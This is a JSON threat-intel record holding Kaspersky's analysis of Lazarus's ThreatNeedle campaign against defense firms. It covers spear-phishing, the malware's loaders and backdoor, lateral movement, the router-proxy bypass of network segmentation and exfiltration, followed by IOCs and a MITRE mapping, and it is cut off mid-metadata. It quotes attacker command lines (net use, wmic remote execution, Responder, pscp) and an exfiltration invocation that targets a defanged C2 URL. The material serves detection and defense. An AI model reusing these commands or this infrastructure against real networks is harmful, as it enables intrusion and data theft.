{ "id": "5e31198e-b39a-4578-8a8d-0b5aeb2913bd", "created_at": "2026-04-06T00:11:27.60329Z", "updated_at": "2026-04-10T03:38:19.498402Z", "deleted_at": null, "sha1_hash": "392c0d65d86c9e8426d91d0d082485dcbb8c082a", "title": "Lazarus targets defense industry with ThreatNeedle", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2891864, "plain_text": "Lazarus targets defense industry with ThreatNeedle\r\nBy Vyacheslav Kopeytsev\r\nPublished: 2021-02-25 · Archived: 2026-04-02 10:49:44 UTC\r\nLazarus targets defense industry with ThreatNeedle (PDF)\r\nWe named Lazarus the most active group of 2020. We’ve observed numerous activities by this notorious APT\r\ngroup targeting various industries. The group has changed target depending on the primary objective. Google TAG\r\nhas recently published a post about a campaign by Lazarus targeting security researchers. After taking a closer\r\nlook, we identified the malware used in those attacks as belonging to a family that we call ThreatNeedle. We have\r\nseen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus\r\nwas launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of\r\nManuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle\r\nof an attack, uncovering more technical details and links to the group’s other campaigns.\r\nThe group made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal\r\ninformation gathered using publicly available sources. After gaining an initial foothold, the attackers gathered\r\ncredentials and moved laterally, seeking crucial assets in the victim environment. We observed how they overcame\r\nnetwork segmentation by gaining access to an internal router machine and configuring it as a proxy server,\r\nallowing them to exfiltrate stolen data from the intranet network to their remote server. So far organizations in\r\nmore than a dozen countries have been affected.\r\nDuring this investigation we had a chance to look into the command-and-control infrastructure. The attackers\r\nconfigured multiple C2 servers for various stages, reusing several scripts we’ve seen in previous attacks by the\r\ngroup. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus\r\ngroup campaigns.\r\nThe full article is available on Kaspersky Threat Intelligence. Customers of Kaspersky Intelligence reporting may\r\ncontact: intelreports@kaspersky.com\r\nFor more information please contact: ics-cert@kaspersky.com\r\nInitial infection\r\nIn this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group\r\nstudied publicly available information about the targeted organization and identified email addresses belonging to\r\nvarious departments of the company.\r\nEmail addresses in those departments received phishing emails that either had a malicious Word document\r\nattached or a link to one hosted on a remote server. The phishing emails claimed to have urgent updates on today’s\r\nhottest topic – COVID-19 infections. The phishing emails were carefully crafted and written on behalf of a\r\nmedical center that is part of the organization under attack.\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 1 of 20\n\nPhishing email with links to malicious documents\r\nThe attackers registered accounts with a public email service, making sure the sender’s email addresses looked\r\nsimilar to the medical center’s real email address. The signature shown in the phishing emails included the actual\r\npersonal data of the deputy head doctor of the attacked organization’s medical center. The attackers were able to\r\nfind this information on the medical center’s public website.\r\nA macro in the Microsoft Word document contained the malicious code designed to download and execute\r\nadditional malicious software on the infected system.\r\nThe document contains information on the population health assessment program and is not directly related to the\r\nsubject of the phishing email (COVID-19), suggesting the attackers may not completely understand the meaning\r\nof the contents they used.\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 2 of 20\n\nContents of malicious document\r\nThe content of the lure document was copied from an online post by a health clinic.\r\nOur investigation showed that the initial spear-phishing attempt was unsuccessful due to macros being disabled in\r\nthe Microsoft Office installation of the targeted systems. In order to persuade the target to allow the malicious\r\nmacro, the attacker sent another email showing how to enable macros in Microsoft Office.\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 3 of 20\n\nEmail with instructions on enabling macros #1\r\nAfter sending the above email with explanations, the attackers realized that the target was using a different version\r\nof Microsoft Office and therefore required a different procedure for enabling macros. The attackers subsequently\r\nsent another email showing the correct procedure in a screenshot with a Russian language pack.\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 4 of 20\n\nEmail with instructions on enabling macros #2\r\nThe content in the spear-phishing emails sent by the attackers from May 21 to May 26, 2020, did not contain any\r\ngrammatical mistakes. However, in subsequent emails the attackers made numerous errors, suggesting they may\r\nnot be native Russian speakers and were using translation tools.\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 5 of 20\n\nEmail containing several grammatical mistakes\r\nOn June 3, 2020, one of the malicious attachments was opened by employees and at 9:30 am local time the\r\nattackers gained remote control of the infected system.\r\nThis group also utilized different types of spear-phishing attack. One of the compromised hosts received several\r\nspear-phishing documents on May 19, 2020. The malicious file that was delivered, named\r\nBoeing_AERO_GS.docx, fetches a template from a remote server.\r\nHowever, no payload created by this malicious document could be discovered. We speculate that the infection\r\nfrom this malicious document failed for a reason unknown to us. A few days later, the same host opened a\r\ndifferent malicious document. The threat actor wiped these files from disk after the initial infection meaning they\r\ncould not be obtained.\r\nNonetheless, a related malicious document with this malware was retrieved based on our telemetry. It creates a\r\npayload and shortcut file and then continues executing the payload by using the following command line\r\nparameters.\r\nPayload path: %APPDATA%\\Microsoft\\Windows\\lconcaches.db\r\nShortcut path: %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\OneDrives.lnk\r\nCommand Line; please note that the string at the end is hard-coded, but different for each sample:\r\nexe [dllpath],Dispatch n2UmQ9McxUds2b29\r\nThe content of the decoy document depicts the job description of a generator/power industry engineer.\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 6 of 20\n\nDecoy document\r\nMalware implants\r\nUpon opening a malicious document and allowing the macro, the malware is dropped and proceeds to a multistage\r\ndeployment procedure. The malware used in this campaign belongs to a known malware cluster we named\r\nThreatNeedle. We attribute this malware family to the advanced version of Manuscrypt (a.k.a. NukeSped), a\r\nfamily belonging to the Lazarus group. We previously observed the Lazarus group utilizing this cluster when\r\nattacking cryptocurrency businesses and a mobile game company. Although the malware involved and the entire\r\ninfection process is known and has not changed dramatically compared to previous findings, the Lazarus group\r\ncontinued using ThreatNeedle malware aggressively in this campaign.\r\nInfection procedure\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 7 of 20\n\nThe payload created by the initial spear-phishing document loads the next stage as a backdoor running in-memory\r\n– the ThreatNeedle backdoor. ThreatNeedle offers functionality to control infected victims. The actor uses it to\r\ncarry out initial reconnaissance and deploy additional malware for lateral movement. When moving laterally, the\r\nactor uses ThreatNeedle installer-type malware in the process. This installer is responsible for implanting the next\r\nstage loader-type malware and registering it for auto-execution in order to achieve persistence. The ThreatNeedle\r\nloader-type malware exists in several variations and serves the primary purpose of loading the final stage of the\r\nThreatNeedle malware in-memory.\r\nThreatNeedle installer\r\nUpon launch, the malware decrypts an embedded string using RC4 (key: B6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73\r\n89 C1 D2 C4) and compares it to “7486513879852“. If the user executes this malware without a command line\r\nparameter, the malware launches a legitimate calculator carrying a dark icon of the popular Avengers franchise.\r\nFurther into the infection process, the malware chooses a service name randomly from netsvc in order to use it for\r\nthe payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing\r\nthe infection time and the random service name that is chosen. We’ve discovered that the malware operator checks\r\nthis file to see whether the remote host was infected and, if so, when the infection happened.\r\nIt then decrypts the embedded payload using the RC4 algorithm, saves it to an .xml extension with a randomly\r\ncreated five-character file name in the current directory and then copies it to the system folder with a .sys\r\nextension.\r\nThis final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key\r\n(3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows\r\nservice and launched. In addition, the malware saves the configuration data as a registry key encrypted in RC4:\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameConfig – Description\r\nThreatNeedle loader\r\nThis component is responsible for loading the final backdoor payload into memory. In order to do this, the\r\nmalware uses several techniques to decrypt its payload:\r\nLoading the payload from the registry.\r\nLoading the payload from itself after decrypting RC4 and decompression.\r\nLoading the payload from itself after decrypting AES and decompression.\r\nLoading the payload from itself after decompression.\r\nLoading the payload from itself after one-byte XORing.\r\nMost loader-style malware types check the command line parameter and only proceed with the malicious routine\r\nif an expected parameter is given. This is a common trait in ThreatNeedle loaders. The most common example\r\nwe’ve seen is similar to the ThreatNeedle installer – the malware decrypts an embedded string using RC4, and\r\ncompares it with the parameter “Sx6BrUk4v4rqBFBV” upon launch. If it matches, the malware begins decrypting\r\nits embedded payload using the same RC4 key. The decrypted payload is an archive file which is subsequently\r\ndecompressed in the process. Eventually, the ThreatNeedle malware spawns in memory.\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 8 of 20\n\nThe other variant of the loader is preparing the next stage payload from the victim’s registry. As we can see from\r\nthe installer malware description, we suspect that the registry key was created by the installer component.\r\nRetrieved data from the registry is decrypted using RC4 and then decompressed. Eventually, it gets loaded into\r\nmemory and the export function is invoked.\r\nThreatNeedle backdoor\r\nThe final payload executed in memory is the actual ThreatNeedle backdoor. It has the following functionality to\r\ncontrol infected victim machines:\r\nManipulate files/directories\r\nSystem profiling\r\nControl backdoor processes\r\nEnter sleeping or hibernation mode\r\nUpdate backdoor configuration\r\nExecute received commands\r\nPost-exploitation phase\r\nFrom one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and\r\nmoved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a\r\ncompletely isolated network segment cut off from the internet by compromising a router virtual machine, as we\r\nexplain below under “Overcoming network segmentation“.\r\nJudging by the hosts that were infected with the ThreatNeedle backdoors post-exploitation, we speculate that the\r\nprimary intention of this attack is to steal intellectual property. Lastly, the stolen data gets exfiltrated using a\r\ncustom tool that will be described in the “Exfiltration” section. Below is a rough timeline of the compromise we\r\ninvestigated:\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 9 of 20\n\nTimeline of infected hosts\r\nCredential gathering\r\nDuring the investigation we discovered that the Responder tool was executed from one of the victim machines that\r\nhad received the spear-phishing document. One day after the initial infection, the malware operator placed the tool\r\nonto this host and executed it using the following command:\r\n[Responder file path] -i [IP address] -rPv\r\nSeveral days later, the attacker started to move laterally originating from this host. Therefore, we assess that the\r\nattacker succeeded in acquiring login credentials from this host and started using them for further malicious\r\nactivity.\r\nLateral movement\r\nAfter acquiring the login credentials, the actor started to move laterally from workstations to server hosts. Typical\r\nlateral movement methods were employed, using Windows commands. First, a network connection with a remote\r\nhost was established using the command “net use”.\r\nnet use \\\\[IP address]\\IPC$ “[password]” /u:”[user name]” \u003e $temp\\~tmp5936t.tmp 2\u003e\u00261″\r\nNext, the actor copied malware to the remote host using the Windows Management Instrumentation Command-line (WMIC).\r\nexe /node:[IP address] /user:”[user name]” /password:”[password]” PROCESS CALL CREATE “cmd.exe\r\n/c $appdata\\Adobe\\adobe.bat“\r\nexe /node:[IP address] /user:”[user name]” /password:”[password]” PROCESS CALL CREATE “cmd /c sc\r\nqueryex helpsvc \u003e $temp\\tmp001.dat“\r\nOvercoming network segmentation\r\nIn the course of this research, we identified another highly interesting technique used by the attackers for lateral\r\nmovement and exfiltration of stolen data. The enterprise network under attack was divided into two segments:\r\ncorporate (a network on which computers had internet access) and restricted (a network on which computers\r\nhosted sensitive data and had no internet access). According to corporate policies, no transfer of information was\r\nallowed between these two segments. In other words, the two segments were meant to be completely separated.\r\nInitially, the attackers were able to get access to systems with internet access and spent a long time distributing\r\nmalware between machines in the network’s corporate segment. Among the compromised machines were those\r\nused by the administrators of the enterprise’s IT infrastructure.\r\nIt is worth noting that the administrators could connect both to the corporate and the restricted network segments\r\nto maintain systems and provide users with technical support in both zones. As a result, by gaining control of\r\nadministrator workstations the attackers were able to access the restricted network segment.\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 10 of 20\n\nHowever, since directly routing traffic between the segments was not possible, the attackers couldn’t use their\r\nstandard malware set to exfiltrate data from the restricted segment to the C2.\r\nThe situation changed on July 2 when the attackers managed to obtain the credentials for the router used by the\r\nadministrators to connect to systems in both segments. The router was a virtual machine running CentOS to route\r\ntraffic between several network interfaces based on predefined rules.\r\nConnection layout between victim’s network segments\r\nAccording to the evidence collected, the attackers scanned the router’s ports and detected a Webmin interface.\r\nNext, the attackers logged in to the web interface using a privileged root account. It’s unknown how the attackers\r\nwere able to obtain the credentials for that account, but it’s possible the credentials were saved in one of the\r\ninfected system’s browser password managers.\r\nLog listing Webmin web interface logins\r\nBy gaining access to the configuration panel the attackers configured the Apache web server and started using the\r\nrouter as a proxy server between the organization’s corporate and restricted segments.\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 11 of 20\n\nList of services used on the router\r\nSeveral days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTy PSCP\r\n(the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware\r\nto the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the\r\nenterprise network, using the router to host the samples. In addition, malware running in the network’s restricted\r\nsegment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up\r\non the same router.\r\nNew connection layout after attacker’s intrusion\r\nIn the course of the investigation we identified malware samples with the hardcoded URL of the router used as a\r\nproxy server.\r\nHardcoded proxy address in the malware\r\nSince the attackers regularly deleted log files from the router, only a handful of commands entered to the\r\ncommand line via SSH could be recovered. An analysis of these commands shows that the attackers tried to\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 12 of 20\n\nreconfigure traffic routing using the route command.\r\nAttacker commands\r\nThe attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted\r\nsegment of the enterprise network. On September 27, the attackers started removing all traces of their activity\r\nfrom the router, using the logrotate utility to set up automatic deletion of log files.\r\nWebmin log\r\nExfiltration\r\nWe observed that the malware operator attempted to create SSH tunnels to a remote server located in South Korea\r\nfrom several compromised server hosts. They used a custom tunneling tool to achieve this. The tool receives four\r\nparameters: client IP address, client port, server IP address and server port. The tool offers basic functionality,\r\nforwarding client traffic to the server. In order to create a covert channel, the malware encrypts forwarded traffic\r\nusing trivial binary encryption.\r\nEncryption routine\r\nUsing the covert channel, the adversary copied data from the remote server over to the host using the PuTTy PSCP\r\ntool:\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 13 of 20\n\n%APPDATA%\\PBL\\unpack.tmp  -pw [password] root@[IP address]:/tmp/cab0215\r\n%APPDATA%\\PBL\\cab0215.tmp\r\nAfter copying data from the server, the actor utilized the custom tool to exfiltrate stolen data to the remote server.\r\nThis malware looks like a legitimate VNC client and runs like one if it’s executed without any command line\r\nparameters.\r\nExecution of malware without parameters\r\nHowever, if this application is executed with specific command line parameters, it runs an alternate, malicious\r\nfunction. According to our telemetry, the actor executed this application with six parameters:\r\n%APPDATA%\\Comms\\Comms.dat S0RMM-50QQE-F65DN-DCPYN-5QEQA\r\nhxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp %APPDATA%\\Comms\\cab59.tmp\r\nFL0509 15000\r\nAlso, if the number of command line parameters is greater than six, the malware jumps into a malicious routine.\r\nThe malware also checks the length of the second argument – if it’s less than 29 characters, it terminates the\r\nexecution. When the parameter checking procedure has passed successfully, the malware starts to decrypt its next\r\npayload.\r\nThe embedded payload gets decrypted via XOR, where each byte from the end of the payload gets applied to the\r\npreceding byte. Next, the XORed blob receives the second command line argument that’s provided (in this case\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 14 of 20\n\nS0RMM-50QQE-F65DN-DCPYN-5QEQA). The malware can accept more command line arguments, and\r\ndepending on its number it runs differently. For example, it can also receive proxy server addresses with the “-p”\r\noption.\r\nWhen the decrypted in-memory payload is executed, it compares the header of the configuration data passed with\r\nthe string “0x8406” in order to confirm its validity. The payload opens a given file (in this example\r\n%APPDATA%\\Comms\\cab59.tmp) and starts exfiltrating it to the remote server. When the malware uploads data\r\nto the C2 server, it uses HTTP POST requests with two parameters named ‘fr’ and ‘fp’:\r\nThe ‘fr’ parameter contains the file name from the command line argument to upload.\r\nThe ‘fp’ parameter contains the base64 encoded size, CRC32 value of content and file contents.\r\nContents of fp parameter\r\nAttribution\r\nWe have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware\r\ncluster is attributed only to the Lazarus group. During this investigation, we were able to find connections to\r\nseveral clusters of the Lazarus group.\r\nConnections between Lazarus campaigns\r\nConnection with DeathNote cluster\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 15 of 20\n\nDuring this investigation we identified several connections with the DeathNote (a.k.a. Operation Dream Job)\r\ncluster of the Lazarus group. First of all, among the hosts infected by the ThreatNeedle malware, we discovered\r\none that was also infected with the DeathNote malware, and both threats used the same C2 server URLs.\r\nIn addition, while analyzing the C2 server used in this attack, we found a custom web shell script that was also\r\ndiscovered on the DeathNote C2 server. We also identified that the server script corresponding to the Trojanized\r\nVNC Uploader was found on the DeathNote C2 server.\r\nAlthough DeathNote and this incident show different TTPs, both campaigns share command and control\r\ninfrastructure and some victimology.\r\nConnection with Operation AppleJeus\r\nWe also found a connection with Operation AppleJeus. As we described, the actor used a homemade tunneling\r\ntool in the ThreatNeedle campaign that has a custom encryption routine to create a covert channel. This very same\r\ntool was utilized in operation AppleJeus as well.\r\nSame tunneling tool\r\nConnection with Bookcode cluster\r\nIn our previous blog about Lazarus group, we mentioned the Bookcode cluster attributed to Lazarus group; and\r\nrecently the Korea Internet and Security Agency (KISA) also published a report about the operation. In the report,\r\nthey mentioned a malware cluster named LPEClient used for profiling hosts and fetching next stage payloads.\r\nWhile investigating this incident, we also found LPEClient from the host infected with ThreatNeedle. So, we\r\nassess that the ThreatNeedle cluster is connected to the Bookcode operation.\r\nConclusions\r\nIn recent years, the Lazarus group has focused on attacking financial institutions around the world. However,\r\nbeginning in early 2020, they focused on aggressively attacking the defense industry. While Lazarus has also\r\npreviously utilized the ThreatNeedle malware used in this attack when targeting cryptocurrency businesses, it is\r\ncurrently being actively used in cyberespionage attacks.\r\nThis investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted,\r\nreinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to\r\ncircumvent the security measures they face during their attacks, such as network segmentation. We assess that\r\nLazarus is a highly prolific group, conducting several campaigns using different strategies. They shared tools and\r\ninfrastructure among these campaigns to accomplish their goals.\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 16 of 20\n\nKaspersky ICS CERT would like to thank Vasily Berdnikov (Kaspersky targeted attacks research group) for his\r\nhelp.\r\nAppendix I – Indicators of Compromise\r\nMalicious documents\r\nInstaller\r\nLoader\r\nRegistry Loader\r\nDownloader\r\nTrojanized VNC Uploader\r\nTunneling Tool\r\nLPEClient\r\nFile path\r\n%SYSTEMROOT%\\system32\\bcdbootinfo.tlp\r\n%SYSTEMROOT%\\system32\\Nwsapagent.sys\r\n%SYSTEMROOT%\\system32\\SRService.sys\r\n%SYSTEMROOT%\\system32\\NWCWorkstation.sys\r\n%SYSTEMROOT%\\system32\\WmdmPmSp.sys\r\n%SYSTEMROOT%\\system32\\PCAudit.sys\r\n%SYSTEMROOT%\\system32\\helpsvc.sys\r\nRegistry Path\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameConfig – Description\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\KernelConfig – SubVersion\r\nDomains and IPs\r\nhxxp://forum.iron-maiden[.]ru/core/cache/index[.]php\r\nhxxp://www.au-pair[.]org/admin/Newspaper[.]asp\r\nhxxp://www.au-pair[.]org/admin/login[.]asp\r\nhxxp://www.colasprint[.]com/_vti_log/upload[.]asp\r\nhxxp://www.djasw.or[.]kr/sub/popup/images/upfiles[.]asp\r\nhxxp://www.kwwa[.]org/popup/160307/popup_160308[.]asp\r\nhxxp://www.kwwa[.]org/DR6001/FN6006LS[.]asp\r\nhxxp://www.sanatoliacare[.]com/include/index[.]asp\r\nhxxps://americanhotboats[.]com/forums/core/cache/index[.]php\r\nhxxps://docentfx[.]com/wp-admin/includes/upload[.]php\r\nhxxps://kannadagrahakarakoota[.]org/forums/admincp/upload[.]php\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 17 of 20\n\nhxxps://polyboatowners[.]com/2010/images/BOTM/upload[.]php\r\nhxxps://ryanmcbain[.]com/forum/core/cache/upload[.]php\r\nhxxps://shinwonbook.co[.]kr/basket/pay/open[.]asp\r\nhxxps://shinwonbook.co[.]kr/board/editor/upload[.]asp\r\nhxxps://theforceawakenstoys[.]com/vBulletin/core/cache/upload[.]php\r\nhxxps://www.automercado.co[.]cr/empleo/css/main[.]jsp\r\nhxxps://www.curiofirenze[.]com/include/inc-site[.]asp\r\nhxxps://www.digitaldowns[.]us/artman/exec/upload[.]php\r\nhxxps://www.digitaldowns[.]us/artman/exec/upload[.]php\r\nhxxps://www.dronerc[.]it/forum/uploads/index[.]php\r\nhxxps://www.dronerc[.]it/shop_testbr/Adapter/Adapter_Config[.]php\r\nhxxps://www.edujikim[.]com/intro/blue/view[.]asp\r\nhxxps://www.edujikim[.]com/pay/sample/INIstart[.]asp\r\nhxxps://www.edujikim[.]com/smarteditor/img/upload[.]asp\r\nhxxps://www.fabioluciani[.]com/ae/include/constant[.]asp\r\nhxxps://www.fabioluciani[.]com/es/include/include[.]asp\r\nhxxp://www.juvillage.co[.]kr/img/upload[.]asp\r\nhxxps://www.lyzeum[.]com/board/bbs/bbs_read[.]asp\r\nhxxps://www.lyzeum[.]com/images/board/upload[.]asp\r\nhxxps://martiancartel[.]com/forum/customavatars/avatars[.]php\r\nhxxps://www.polyboatowners[.]com/css/index[.]php\r\nhxxps://www.sanlorenzoyacht[.]com/newsl/include/inc-map[.]asp\r\nhxxps://www.raiestatesandbuilders[.]com/admin/installer/installer/index[.]php\r\nhxxp://156.245.16[.]55/admin/admin[.]asp\r\nhxxp://fredrikarnell[.]com/marocko2014/index[.]php\r\nhxxp://roit.co[.]kr/xyz/mainpage/view[.]asp\r\nSecond stage C2 address\r\nhxxps://www.waterdoblog[.]com/uploads/index[.]asp\r\nhxxp://www.kbcwainwrightchallenge.org[.]uk/connections/dbconn[.]asp\r\nC2 URLs to exfiltrate files used by Trojanized VNC Uploader\r\nhxxps://prototypetrains[.]com:443/forums/core/cache/index[.]php\r\nhxxps://newidealupvc[.]com:443/img/prettyPhoto/jquery.max[.]php\r\nhxxps://mdim.in[.]ua:443/core/cache/index[.]php\r\nhxxps://forum.snowreport[.]gr:443/cache/template/upload[.]php\r\nhxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp\r\nhxxps://www.dellarocca[.]net/it/content/img/img[.]asp\r\nhxxps://www.astedams[.]it/photos/image/image[.]asp\r\nhxxps://www.geeks-board[.]com/blog/wp-content/uploads/2017/cache[.]php\r\nhxxps://cloudarray[.]com/images/logo/videos/cache[.]jsp\r\nAppendix II – MITRE ATT\u0026CK Mapping\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 18 of 20\n\nTactic Technique Technique Name\r\nInitial Access T1566.002 Phishing: Spearphishing Link\r\nExecution\r\nT1059.003\r\nT1204.002\r\nT1569.002\r\nCommand and Scripting Interpreter: Windows Command Shell\r\nUser Execution: Malicious File\r\nSystem Services: Service Execution\r\nPersistence\r\nT1543.003\r\nT1547.001\r\nCreate or Modify System Process: Windows Service\r\nBoot or Logon Autostart Execution: Registry Run Keys / Startup\r\nFolder\r\nPrivilege Escalation T1543.003 Create or Modify System Process: Windows Service\r\nDefense Evasion\r\nT1140\r\nT1070.002\r\nT1070.003\r\nT1070.004\r\nT1036.003\r\nT1036.004\r\nT1112\r\nDeobfuscate/Decode Files or Information\r\nClear Linux or Mac System Logs\r\nClear Command History\r\nFile Deletion\r\nMasquerading: Rename System Utilities\r\nMasquerading: Masquerade Task or Service\r\nModify Registry\r\nCredential Access T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay\r\nDiscovery\r\nT1135\r\nT1057\r\nT1016\r\nT1033\r\nT1049\r\nT1082\r\nT1083\r\nT1007\r\nNetwork Share Discovery\r\nProcess Discovery\r\nSystem Network Configuration Discovery\r\nSystem Owner/User Discovery\r\nSystem Network Connections Discovery\r\nSystem Information Discovery\r\nFile and Directory Discovery\r\nSystem Service Discovery\r\nLateral Movement T1021.002 SMB/Windows Admin Shares\r\nCollection T1560.001 Archive Collected Data: Archive via Utility\r\nCommand and\r\nControl\r\nT1071.001\r\nT1132.002\r\nT1104\r\nT1572\r\nT1090.001\r\nApplication Layer Protocol: Web Protocols\r\nNon-Standard Encoding\r\nMulti-Stage Channels\r\nProtocol Tunneling\r\nInternal Proxy\r\nExfiltration T1041 Exfiltration Over C2 Channel\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 19 of 20\n\nSource: https://securelist.com/lazarus-threatneedle/100803/\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia" ], "references": [ "https://securelist.com/lazarus-threatneedle/100803/" ], "report_names": [ "100803" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "544ecd2c-82c9-417c-9d98-d1ae395df964", "created_at": "2025-10-29T02:00:52.035025Z", "updated_at": "2026-04-10T02:00:05.408558Z", "deleted_at": null, "main_name": "AppleJeus", "aliases": [ "AppleJeus", "Gleaming Pisces", "Citrine Sleet", "UNC1720", "UNC4736" ], "source_name": "MITRE:AppleJeus", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", 